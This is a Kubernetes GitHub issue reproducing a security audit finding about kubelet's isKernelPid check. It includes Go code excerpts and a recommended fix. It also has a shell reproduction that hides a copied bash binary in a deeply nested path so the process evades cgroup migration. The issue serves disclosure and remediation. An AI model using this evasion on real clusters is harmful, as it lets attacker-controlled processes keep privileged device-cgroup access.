-
Notifications
You must be signed in to change notification settings - Fork 41.2k
Description
This issue was reported in the Kubernetes Security Audit Report
Description
The isKernelPid function (Figure 1) checks if a given PID is a kernel PID by checking whether readlink of /proc//exe returns an error. This check is used to filter out kernel processes and move all other processes that were found in the root device’s cgroup to potentially less privileged manager’s cgroup (Figure 2).
The check performed by isKernelPid is too broad. It is possible to create a process that will be filtered as a kernel PID and not moved into potentially less privileged device cgroup.
A readlink of kernel process’ /proc//exe returns an ENOENT error (Figure 3). It is possible to make this operation return another error, for example, by putting the file in a too-long path (Figure 4).
Despite the fact that the isKernelPid check can be bypassed, it is only invoked on the processes from root (“/”) devices cgroup and only in non-default kubelet configuration. This is when system cgroups name is set and the cgroup root is “/” (Figure 5), which can be set by passing: --system-cgroups=/something --cgroup-root=/ to kubelet arguments.
Exploiting this issue requires the attacker to control a process in the root device cgroup and a privileged user with CAP_SYS_ADMIN capability, which is present by default and must be explicitly dropped to modify the rules for device cgroups. Exploitation is, therefore, unlikely.
// Determines whether the specified PID is a kernel PID.
func isKernelPid(pid int) bool {
// Kernel threads have no associated executable.
_, err := os.Readlink(fmt.Sprintf("/proc/%d/exe", pid))
return err != nil
}
Figure 35.1: The isKernelPid function in pkg/kubelet/cm/container_manager_linux.go:869.
func ensureSystemCgroups(rootCgroupPath string, manager *fs.Manager) error {
// Move non-kernel PIDs to the system container.
// (...)
for attemptsRemaining >= 0 {
// (...)
allPids, err := cmutil.GetPids(rootCgroupPath)
// (...)
// Remove kernel pids and other protected PIDs (pid 1, PIDs already in system & kubelet containers)
pids := make([]int, 0, len(allPids))
for _, pid := range allPids {
if pid == 1 || isKernelPid(pid) {
continue
}
pids = append(pids, pid)
}
// (...)
for _, pid := range pids {
err := manager.Apply(pid)
// (...)}
Figure 35.2 The ensureSystemCgroups calls isKernelPid to filter out kernel PIDs from processes from “/” devices cgroup (as the rootCgroupPath argument is hardcoded to “/” and cmutils.GetPids gets pids for given devices cgroup) and then moves those non-kernel PIDs to manager’s cgroup.
# ps aux | grep kworker | head -n1
root 4 0.0 0.0 0 0 ? I< 09:28 0:00 [kworker/0:0H]
# strace -e readlink,readlinkat readlink /proc/4/exe
readlink("/proc/4/exe", 0x55f7adc34100, 64) = -1 ENOENT (No such file or directory)
+++ exited with 1 +++
Figure 35.3 Reading link of a kernel process results in ENOENT. Note that we read the link as root, if we did as unprivileged user, we would get EACESS error.
$ cp /bin/bash malicious_bash
$ for i in {1..30}; do mkdir `python -c 'print("A"*250)'` && mv ./malicious_bash ./AA* && cd ./AA*; done
$ ./malicious_bash
$ strace -e readlink,readlinkat readlink /proc/$$/exe
readlink("/proc/10089/exe", 0x563f05b47100, 64) = -1 ENAMETOOLONG (File name too long)
+++ exited with 1 +++
Figure 35.4 Making readlink /proc//exe return a ENAMETOOLONG error via putting the binary in a too-long path.
if cm.SystemCgroupsName != "" {
if cm.SystemCgroupsName == "/" {
return fmt.Errorf("system container cannot be root (\"/\")")
}
cont := newSystemCgroups(cm.SystemCgroupsName)
cont.ensureStateFunc = func(manager *fs.Manager) error {
return ensureSystemCgroups("/", manager)
}
systemContainers = append(systemContainers, cont)
}
Figure 35.5 ensureSystemCgroups is called only if the systemCgroupsName (--system-cgroups) configuration parameter is not empty (which needs to be specified along with --cgroup-root parameter).
Exploit Scenario
An example of exploitation can be seen below, where a process spawned in a long path is not moved from the root device cgroup to another device cgroup. The process has been manually moved to the root cgroup via cgclassify, displayed in Figure 6. As a comparison, the standard and expected kubelet behavior is displayed in Figure 7, where the process is properly migrated to a different cgroup.
# cp /bin/bash malicious_bash
# for i in {1..30}; do mkdir `python -c 'print("A"*250)'` && mv ./malicious_bash ./AA* && cd ./AA*; done
# ./malicious_bash
# pidof malicious_bash
3682
# ls -la /proc/$$/exe
ls: cannot read symbolic link '/proc/3682/exe': File name too long
lrwxrwxrwx 1 root root 0 Apr 18 13:07 /proc/3682/exe
# cat /proc/$$/cgroup | grep devices
12:devices:/user.slice
# cgclassify -g devices:/ $$
// in the meantime, kubelet has been launched with `--system-cgroups=/user.slice --cgroup-root=/` flags
// by modifying the kubelet code, we could find out it detected those pids as system pids: [1 2 4 6 7 8 9 10 11 12 13 14 15 16 18 19 20 21 22 24 25 26 27 28 30 31 32 33 34 36 37 38 39 40 41 42 43 44 45 46 47 48 49 55 56 57 99 100 101 102 103 104 110 119 136 225 226 228 229 232 234 299 307 348 356 357 425 427 428 429 430 544 2329 2846 2892 2954 3123 3124 3183 3356 3682 8354 10720 10836 15971]
// so the pid of malicious_bash (3682) is there
// and we got such log:
// container_manager_linux.go:887] Found 85 PIDs in root, 85 of them are not to be moved
# cat /proc/$$/cgroup | grep devices
12:devices:/
Figure 35.6 Although kubelet found the attacker controlled process. It didn’t move it to another device cgroup since the process was put in a too-long path to trick the isKernelPid check.
# cat /proc/$$/cgroup | grep devices
12:devices:/user.slice
# cgclassify -g devices:/ $$
# cat /proc/$$/cgroup | grep devices
12:devices:/
// in the meantime, kubelet has been launched with `--system-cgroups=/user.slice --cgroup-root=/` flags
# cat /proc/$$/cgroup | grep devices
12:devices:/user.slice
Figure 35.7 The standard behavior of kubelet moving the non-kernel system processes (the ones from root device cgroup) to the other cgroup.
Recommendation
isKernelPid should explicitly check the error returned from os.Readlink and return true only if the error value isENOENT.
Anything else we need to know?:
See #81146 for current status of all issues created from these findings.
The vendor gave this issue an ID of TOB-K8S-027 and it was finding 36 of the report.
The vendor considers this issue Informational Severity.
To view the original finding, begin on page 85 of the Kubernetes Security Review Report
Environment:
- Kubernetes version: 1.13.4